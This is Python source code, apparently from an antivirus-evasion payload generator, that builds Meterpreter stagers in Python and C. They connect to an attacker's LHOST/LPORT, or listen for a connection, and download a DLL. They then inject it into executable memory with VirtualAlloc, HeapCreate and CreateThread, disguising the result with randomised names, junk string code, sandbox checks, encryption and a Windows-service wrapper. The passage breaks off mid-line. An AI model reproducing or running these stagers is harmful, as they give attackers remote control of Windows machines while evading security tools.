    # HTTPS download below is encrypted but the server is not authenticated.
    payload_code += "ssl._create_default_https_context = ssl._create_unverified_context\n"
    # helper method that returns the sum of all ord values in a string % 0x100
    payload_code += "def %s(s): return sum([ord(ch) for ch in s]) %% 0x100\n" % ( sumMethodName)
    # method that generates a new checksum value for checkin to the meterpreter handler:
    # up to 64 attempts at a random 3-char base plus one extra char whose
    # byte-sum modulo 0x100 equals 92; returns None if no attempt matches.
    payload_code += "def %s():\n\tfor x in range(64):\n" % ( checkinMethodName)
    payload_code += "\t\t%s = ''.join(random.sample(string.ascii_letters + string.digits,3))\n" % ( randBaseName)
    payload_code += "\t\t%s = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n" % ( randLettersName)
    payload_code += "\t\tfor %s in %s:\n" % (randLetterSubName, randLettersName)
    payload_code += "\t\t\tif %s(%s + %s) == 92: return %s + %s\n" % ( sumMethodName, randBaseName, randLetterSubName, randBaseName, randLetterSubName)
    # method that connects to a host/port over https and downloads the hosted data.
    # An empty ProxyHandler is installed first, which bypasses any system proxy;
    # the request carries a fixed, dated User-Agent string.
    payload_code += "def %s(%s,%s):\n" % (downloadMethodName, hostName, portName)
    payload_code += "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
    payload_code += "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
    payload_code += "\turllib.request.install_opener(" + opener_var + ")\n"
    # %%s survives the outer % formatting as %s, so the URL is filled in at run time.
    payload_code += "\t%s = urllib.request.Request(\"https://%%s:%%s/%%s\" %%(%s,%s,%s()), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n" % ( requestName, hostName, portName, checkinMethodName)
    payload_code += "\ttry:\n"
    payload_code += "\t\t%s = urllib.request.urlopen(%s)\n" % (tName, requestName)
    payload_code += "\t\ttry:\n"
    # Responses of 100000 bytes or fewer are treated as "nothing to run";
    # a missing Content-Length header falls through to reading the body anyway.
    payload_code += "\t\t\tif int(%s.info()[\"Content-Length\"]) > 100000: return %s.read()\n" % ( tName, tName)
    payload_code += "\t\t\telse: return ''\n"
    payload_code += "\t\texcept: return %s.read()\n" % (tName)
    payload_code += "\texcept urllib.request.URLError: return ''\n"
    # method to inject a reflective .dll into memory
    payload_code += "def %s(%s):\n" % (injectMethodName, dataName)
    payload_code += "\tif %s != \"\":\n" % (dataName)
    payload_code += "\t\t%s = bytearray(%s)\n" % (byteArrayName, dataName)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # VirtualAlloc(NULL, len, 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE),
        # RtlMoveMemory copy, CreateThread at the buffer, then wait forever (-1).
        # The pointer/handle are passed through c_int, i.e. as 32-bit values.
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
    # Assuming heap injection: any INJECT_METHOD value other than "virtual" lands here.
    else:
        HeapVar = evasion_helpers.randomString()
        # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE, 2*len, 0) then
        # HeapAlloc(heap, 0x00000008 = HEAP_ZERO_MEMORY, len); the rest mirrors
        # the virtual branch (copy, CreateThread, infinite wait).
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
    # download the metpreter .dll and inject it (top-level calls of the emitted script;
    # LHOST is quoted as a string literal, LPORT is spliced in unquoted)
    payload_code += "%s = ''\n" % (data2Name)
    payload_code += "%s = %s(\"%s\", %s)\n" % ( data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payload_code += "%s(%s)\n" % (injectMethodName, data2Name)
    # Optional final pass through the pyherion crypter over the whole source.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self):
    """Assemble the Python source of the reverse-TCP stager and store it.

    The emitted script connects to LHOST:LPORT over a plain TCP socket,
    reads a 4-byte little-endian length, receives that many bytes of stage
    data, patches the socket descriptor into the first five bytes of the
    buffer, and hands the result to an in-memory loader built on
    ``ctypes.windll.kernel32``.  Environment checks come from
    ``gamemaker.senecas_games`` and nest the rest of the script under them.
    Result is written to ``self.payload_source_code``; returns None.
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    # ctypes is imported under a random alias so the literal module name
    # never appears in the emitted source.
    payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"
    # How I'm tracking the number of nested tabs needed
    # to make the payload
    num_tabs_required = 0
    # senecas_games returns the environment-check preamble and how many
    # `if` levels it opened; everything below is indented by that amount.
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    # socket and shellcode variables that need to be kept global
    payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % ( shellCodeName, socketName)
    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += '\t' * num_tabs_required + "def %s():\n" % ( getDataMethodName)
    payload_code += '\t' * num_tabs_required + "\ttry:\n"
    payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % ( socketName)
    # build the socket and connect to the handler
    # (LHOST is emitted as a quoted literal, LPORT unquoted)
    payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName)
    payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    # pack the underlying socket file descriptor into a c structure
    # (4-byte little-endian int)
    payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( socketName)
    # receive buffer starts as a single-space bytes object, not empty
    payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % ( rcvStringName)
    # receive ALL of the payload .dll data
    payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName)
    # copy into a mutable ctypes buffer so the first bytes can be patched below
    payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % ( rcvStringName, rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    # (0xBF is the x86 opcode for `mov edi, imm32`; the next four bytes are the fd)
    payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName)
    # copy the socket fd in
    payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName)
    payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % ( rcvCStringName)
    # any failure (connect, recv, unpack) is swallowed and yields None
    payload_code += '\t' * num_tabs_required + "\texcept: return None\n"
    # build the method that injects the .dll into memory
    payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % ( injectMethodName, tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % ( tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % ( shellcodeBufName, tempShellcodeName)
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # allocate enough virtual memory to stuff the .dll in
        # (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE;
        # the pointer is passed through c_int, i.e. as a 32-bit value)
        payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        # expose the bytearray as a c_char array (shared buffer, no copy)
        # so RtlMoveMemory can read from it
        payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
        # copy the .dll into the allocated memory
        payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
        # kick the thread off to execute the .dll (thread handle kept as `ht`)
        payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        # wait for the .dll execution to finish (-1 = INFINITE)
        payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
    # Assume HEAP Injection for any other INJECT_METHOD value
    else:
        HeapVar = evasion_helpers.randomString()
        handleName = evasion_helpers.randomString()
        # HeapCreate(0x00040000 = HEAP_CREATE_ENABLE_EXECUTE, 2*len, 0) then
        # HeapAlloc(heap, 0x00000008 = HEAP_ZERO_MEMORY, len); the remaining
        # steps mirror the virtual branch (copy, CreateThread, infinite wait).
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
    # download the stager (top-level call in the emitted script)
    payload_code += '\t' * num_tabs_required + "%s = %s()\n" % ( shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += '\t' * num_tabs_required + "%s(%s)\n" % ( injectMethodName, shellCodeName)
    # Optional final pass through the pyherion crypter over the whole source.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return
def generate(self): winsock_init_name = evasion_helpers.randomString() punt_name = evasion_helpers.randomString() recv_all_name = evasion_helpers.randomString() wsconnect_name = evasion_helpers.randomString() # the real includes needed includes = [ "#include <stdio.h>" , "#include <stdlib.h>", "#include <windows.h>", "#include <string.h>"] # max length string for obfuscation global_max_string_length = 10000 max_string_length = random.randint(100,global_max_string_length) max_num_strings = 10000 # TODO: add in more string processing functions randName1 = evasion_helpers.randomString() # reverse() randName2 = evasion_helpers.randomString() # doubles characters stringModFunctions = [ (randName1, "char* %s(const char *t) { int length= strlen(t); int i; char* t2 = (char*)malloc((length+1) * sizeof(char)); for(i=0;i<length;i++) { t2[(length-1)-i]=t[i]; } t2[length] = '\\0'; return t2; }" %(randName1)), (randName2, "char* %s(char* s){ char *result = malloc(strlen(s)*2+1); int i; for (i=0; i<strlen(s)*2+1; i++){ result[i] = s[i/2]; result[i+1]=s[i/2];} result[i] = '\\0'; return result; }" %(randName2)) ] random.shuffle(stringModFunctions) # obsufcation - "logical nop" string generation functions randString1 = evasion_helpers.randomString(50) randName1 = evasion_helpers.randomString() randVar1 = evasion_helpers.randomString() randName2 = evasion_helpers.randomString() randVar2 = evasion_helpers.randomString() randVar3 = evasion_helpers.randomString() randName3 = evasion_helpers.randomString() randVar4 = evasion_helpers.randomString() randVar5 = evasion_helpers.randomString() stringGenFunctions = [ (randName1, "char* %s(){ char *%s = %s(\"%s\"); return strstr( %s, \"%s\" );}" %(randName1, randVar1, stringModFunctions[0][0], randString1, randVar1, randString1[25])), (randName2, "char* %s(){ char %s[%s], %s[%s/2]; strcpy(%s,\"%s\"); strcpy(%s,\"%s\"); return %s(strcat( %s, %s)); }" % (randName2, randVar2, max_string_length, randVar3, max_string_length, randVar2, 
evasion_helpers.randomString(50), randVar3, evasion_helpers.randomString(50), stringModFunctions[1][0], randVar2, randVar3)), (randName3, "char* %s() { char %s[%s] = \"%s\"; char *%s = strupr(%s); return strlwr(%s); }" % (randName3, randVar4, max_string_length, evasion_helpers.randomString(50), randVar5, randVar4, randVar5)) ] random.shuffle(stringGenFunctions) # obfuscation - add in our fake includes fake_includes = ["#include <sys/timeb.h>", "#include <time.h>", "#include <math.h>", "#include <signal.h>", "#include <stdarg.h>", "#include <limits.h>", "#include <assert.h>"] for x in range(1, random.randint(1,7)): includes.append(fake_includes[x]) # obsufcation - shuffle up our real and fake includes random.shuffle(includes) code = "#define _WIN32_WINNT 0x0500\n" code += "#include <winsock2.h>\n" code += "\n".join(includes) + "\n" # real - service related headers (check the stub) hStatusName = evasion_helpers.randomString() serviceHeaders = ["SERVICE_STATUS ServiceStatus;","SERVICE_STATUS_HANDLE %s;" %(hStatusName), "void ServiceMain(int argc, char** argv);", "void ControlHandler(DWORD request);"] random.shuffle(serviceHeaders) code += "\n".join(serviceHeaders) # obsufcation - string mod functions code += stringModFunctions[0][1] + "\n" code += stringModFunctions[1][1] + "\n" # real - build the winsock_init function wVersionRequested_name = evasion_helpers.randomString() wsaData_name = evasion_helpers.randomString() code += "void %s() {" % (winsock_init_name) code += "WORD %s = MAKEWORD(%s, %s); WSADATA %s;" % (wVersionRequested_name, evasion_helpers.obfuscateNum(2,4),evasion_helpers.obfuscateNum(2,4), wsaData_name) code += "if (WSAStartup(%s, &%s) < 0) { WSACleanup(); exit(1);}}\n" %(wVersionRequested_name,wsaData_name) # first logical nop string function code += stringGenFunctions[0][1] + "\n" # real - build punt function my_socket_name = evasion_helpers.randomString() code += "void %s(SOCKET %s) {" %(punt_name, my_socket_name) code += "closesocket(%s);" 
%(my_socket_name) code += "WSACleanup();" code += "exit(1);}\n" # obsufcation - second logical nop string function code += stringGenFunctions[1][1] + "\n" # real - build recv_all function my_socket_name = evasion_helpers.randomString() buffer_name = evasion_helpers.randomString() len_name = evasion_helpers.randomString() code += "int %s(SOCKET %s, void * %s, int %s){" %(recv_all_name, my_socket_name, buffer_name, len_name) code += "int slfkmklsDSA=0;int rcAmwSVM=0;" code += "void * startb = %s;" %(buffer_name) code += "while (rcAmwSVM < %s) {" %(len_name) code += "slfkmklsDSA = recv(%s, (char *)startb, %s - rcAmwSVM, 0);" %(my_socket_name, len_name) code += "startb += slfkmklsDSA; rcAmwSVM += slfkmklsDSA;" code += "if (slfkmklsDSA == SOCKET_ERROR) %s(%s);} return rcAmwSVM; }\n" %(punt_name, my_socket_name) # obsufcation - third logical nop string function code += stringGenFunctions[2][1] + "\n" # real - build wsconnect function target_name = evasion_helpers.randomString() sock_name = evasion_helpers.randomString() my_socket_name = evasion_helpers.randomString() code += "SOCKET %s() { struct hostent * %s; struct sockaddr_in %s; SOCKET %s;" % (wsconnect_name, target_name, sock_name, my_socket_name) code += "%s = socket(AF_INET, SOCK_STREAM, 0);" %(my_socket_name) code += "if (%s == INVALID_SOCKET) %s(%s);" %(my_socket_name, punt_name, my_socket_name); code += "%s = gethostbyname(\"%s\");" %(target_name, self.required_options["LHOST"][0]) code += "if (%s == NULL) %s(%s);" %(target_name, punt_name, my_socket_name) code += "memcpy(&%s.sin_addr.s_addr, %s->h_addr, %s->h_length);" %(sock_name, target_name, target_name) code += "%s.sin_family = AF_INET;" %(sock_name) code += "%s.sin_port = htons(%s);" %(sock_name, evasion_helpers.obfuscateNum(int(self.required_options["LPORT"][0]),32)) code += "if ( connect(%s, (struct sockaddr *)&%s, sizeof(%s)) ) %s(%s);" %(my_socket_name, sock_name, sock_name, punt_name, my_socket_name) code += "return %s;}\n" %(my_socket_name) # real - 
main() method for the service code serviceName = evasion_helpers.randomString() code += "void main() { SERVICE_TABLE_ENTRY ServiceTable[2];" serviceTableEntries = [ "ServiceTable[0].lpServiceName = \"%s\";" %(serviceName), "ServiceTable[0].lpServiceProc = (LPSERVICE_MAIN_FUNCTION)ServiceMain;", "ServiceTable[1].lpServiceName = NULL;", "ServiceTable[1].lpServiceProc = NULL;"] random.shuffle(serviceTableEntries) code += "\n".join(serviceTableEntries) code += "StartServiceCtrlDispatcher(ServiceTable);}\n" # real - service status options for us to shuffle serviceStatusOptions = ["ServiceStatus.dwWin32ExitCode = 0;", "ServiceStatus.dwCurrentState = SERVICE_START_PENDING;", "ServiceStatus.dwWaitHint = 0;", "ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN;", "ServiceStatus.dwServiceSpecificExitCode = 0;", "ServiceStatus.dwCheckPoint = 0;", "ServiceStatus.dwServiceType = SERVICE_WIN32;"] random.shuffle(serviceStatusOptions) # real - serviceMain() code code += "void ServiceMain(int argc, char** argv) {\n" code += "\n".join(serviceStatusOptions) code += "%s = RegisterServiceCtrlHandler( \"%s\", (LPHANDLER_FUNCTION)ControlHandler);" %(hStatusName, serviceName) code += "if (%s == (SERVICE_STATUS_HANDLE)0) return;" %(hStatusName) code += "ServiceStatus.dwCurrentState = SERVICE_RUNNING;" code += "SetServiceStatus (%s, &ServiceStatus);" %(hStatusName) code += "while (ServiceStatus.dwCurrentState == SERVICE_RUNNING) {\n" # obsufcation - random variable names size_name = evasion_helpers.randomString() buffer_name = evasion_helpers.randomString() function_name = evasion_helpers.randomString() my_socket_name = evasion_helpers.randomString() count_name = evasion_helpers.randomString() # obsufcation - necessary declarations char_array_name_1 = evasion_helpers.randomString() number_of_strings_1 = random.randint(1,max_num_strings) char_array_name_2 = evasion_helpers.randomString() number_of_strings_2 = random.randint(1,max_num_strings) char_array_name_3 = 
evasion_helpers.randomString() number_of_strings_3 = random.randint(1,max_num_strings) # real - necessary declarations code += "ULONG32 %s;" %(size_name) code += "char * %s;" %(buffer_name) code += "int i;" code += "char* %s[%s];" % (char_array_name_1, number_of_strings_1) code += "void (*%s)();" %(function_name) # obsufcation - malloc our first string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_1, char_array_name_1, random.randint(max_string_length,global_max_string_length)) code += "%s();" %(winsock_init_name) code += "char* %s[%s];" % (char_array_name_2, number_of_strings_2) code += "SOCKET %s = %s();" %(my_socket_name,wsconnect_name) # obsufcation - malloc our second string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_2, char_array_name_2, random.randint(max_string_length,global_max_string_length)) # real - receive the 4 byte size from the handler code += "int %s = recv(%s, (char *)&%s, %s, 0);" % (count_name, my_socket_name, size_name, evasion_helpers.obfuscateNum(4,2)) # real - punt the socket if something goes wrong code += "if (%s != %s || %s <= 0) %s(%s);" %(count_name, evasion_helpers.obfuscateNum(4,2), size_name, punt_name, my_socket_name) # real - virtual alloc space for the meterpreter .dll code += "%s = VirtualAlloc(0, %s + %s, MEM_COMMIT, PAGE_EXECUTE_READWRITE);" %(buffer_name, size_name, evasion_helpers.obfuscateNum(5,2)) # obsufcation - declare space for our 3 string obfuscation array code += "char* %s[%s];" % (char_array_name_3, number_of_strings_3) # obsufcation - first string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_1, char_array_name_1, stringGenFunctions[0][0]) # real - check if the buffer received is null, if so punt the socket code += "if (%s == NULL) %s(%s);" %(buffer_name, punt_name, my_socket_name) # real - prepend some buffer magic to push the socket number onto the stack code += "%s[0] = 
0xBF;" %(buffer_name) # real- copy the 4 magic bytes into the buffer code += "memcpy(%s + 1, &%s, %s);" %(buffer_name, my_socket_name, evasion_helpers.obfuscateNum(4,2)) # obsufcation - malloc our third string obfuscation array code += "for (i = 0; i < %s; ++i) %s[i] = malloc (%s);" %(number_of_strings_3, char_array_name_3, random.randint(max_string_length,global_max_string_length)) # obsufcation - second string obfuscation method code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_2, char_array_name_2, stringGenFunctions[1][0]) # real - receive all data from the socket code += "%s = %s(%s, %s + %s, %s);" %(count_name, recv_all_name, my_socket_name, buffer_name, evasion_helpers.obfuscateNum(5,2), size_name) code += "%s = (void (*)())%s;" %(function_name, buffer_name) code += "%s();" %(function_name) # obsufcation - third string obfuscation method (never called) code += "for (i=0; i<%s; ++i){strcpy(%s[i], %s());}" %(number_of_strings_3, char_array_name_3, stringGenFunctions[2][0]) code += "} return; }\n" # service control handler code code += """void ControlHandler(DWORD request) { switch(request) { case SERVICE_CONTROL_STOP: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus (%s, &ServiceStatus); return; case SERVICE_CONTROL_SHUTDOWN: ServiceStatus.dwWin32ExitCode = 0; ServiceStatus.dwCurrentState = SERVICE_STOPPED; SetServiceStatus (%s, &ServiceStatus); return; default: break; } SetServiceStatus (%s, &ServiceStatus); return; } """ %(hStatusName, hStatusName, hStatusName) self.payload_source_code = code return
def generate(self): # randomize all of the variable names used shellCodeName = evasion_helpers.randomString() socketName = evasion_helpers.randomString() clientSocketName = evasion_helpers.randomString() getDataMethodName = evasion_helpers.randomString() fdBufName = evasion_helpers.randomString() rcvStringName = evasion_helpers.randomString() rcvCStringName = evasion_helpers.randomString() injectMethodName = evasion_helpers.randomString() tempShellcodeName = evasion_helpers.randomString() shellcodeBufName = evasion_helpers.randomString() fpName = evasion_helpers.randomString() tempCBuffer = evasion_helpers.randomString() payload_code = "import struct, socket, binascii, ctypes, random, time\n" # socket and shellcode variables that need to be kept global payload_code += "%s, %s = None, None\n" % (shellCodeName, socketName) # build the method that creates a socket, connects to the handler, # and downloads/patches the meterpreter .dll payload_code += "def %s():\n" % (getDataMethodName) payload_code += "\ttry:\n" payload_code += "\t\tglobal %s\n" % (socketName) payload_code += "\t\tglobal %s\n" % (clientSocketName) # build the socket and connect to the handler payload_code += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName) payload_code += "\t\t%s.bind(('%s', %s))\n" % ( socketName, self.required_options["RHOST"][0], str(self.required_options["LPORT"][0])) payload_code += "\t\t%s.listen(1)\n" % (socketName) payload_code += "\t\t%s,_ = %s.accept()\n" % (clientSocketName, socketName) # pack the underlying socket file descriptor into a c structure payload_code += "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, clientSocketName) # unpack the length of the payload, received as a 4 byte array from the handler payload_code += "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( clientSocketName) payload_code += "\t\t" + rcvStringName + " = b\" \"\n" # receive ALL of the payload .dll data payload_code += "\t\twhile len(%s) < l: %s += 
%s.recv(l)\n" % ( rcvStringName, rcvStringName, clientSocketName) payload_code += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % ( rcvCStringName, rcvStringName, rcvStringName) # prepend a little assembly magic to push the socket fd into the edi register payload_code += "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName) # copy the socket fd in payload_code += "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName) payload_code += "\t\treturn %s\n" % (rcvCStringName) payload_code += "\texcept: return None\n" # build the method that injects the .dll into memory payload_code += "def %s(%s):\n" % (injectMethodName, tempShellcodeName) payload_code += "\tif %s != None:\n" % (tempShellcodeName) payload_code += "\t\t%s = bytearray(%s)\n" % (shellcodeBufName, tempShellcodeName) # allocate enough virtual memory to stuff the .dll in payload_code += "\t\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" % ( fpName, shellcodeBufName) # virtual lock to prevent the memory from paging out to disk payload_code += "\t\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))\n" % ( fpName, shellcodeBufName) payload_code += "\t\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)\n" % ( tempCBuffer, shellcodeBufName, shellcodeBufName) # copy the .dll into the allocated memory payload_code += "\t\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))\n" % ( fpName, tempCBuffer, shellcodeBufName) # kick the thread off to execute the .dll payload_code += "\t\tht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" % ( fpName) # wait for the .dll execution to finish payload_code += "\t\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1))\n" # download the stager payload_code += "%s = %s()\n" % (shellCodeName, 
getDataMethodName) # inject what we grabbed payload_code += "%s(%s)\n" % (injectMethodName, shellCodeName) if self.required_options["USE_PYHERION"][0].lower() == "y": payload_code = encryption.pyherion(payload_code) self.payload_source_code = payload_code return
def generate(self): # Generate the variable names randctypes = evasion_helpers.randomString() ShellcodeVariableName = evasion_helpers.randomString() rand_ptr = evasion_helpers.randomString() rand_ht = evasion_helpers.randomString() RandDESPayload = evasion_helpers.randomString() RandEncShellCodePayload = evasion_helpers.randomString() rand_virtual_protect = evasion_helpers.randomString() # Generate the shellcode if not self.cli_shellcode: Shellcode = self.shellcode.generate(self.cli_opts) if self.shellcode.msfvenompayload: self.payload_type = self.shellcode.msfvenompayload elif self.shellcode.payload_choice: self.payload_type = self.shellcode.payload_choice self.shellcode.payload_choice = '' # assume custom shellcode else: self.payload_type = 'custom' else: Shellcode = self.cli_shellcode Shellcode = Shellcode.encode('latin-1') Shellcode = Shellcode.decode('unicode_escape') payload_code, num_tabs_required = gamemaker.senecas_games(self) # encrypt the shellcode and get our randomized key encoded_ciphertext, encryption_key, iv_value = encryption.des_encryption( Shellcode) encoded_ciphertext = encoded_ciphertext.decode('ascii') if self.required_options["INJECT_METHOD"][0].lower() == "virtual": # Create Payload File payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import 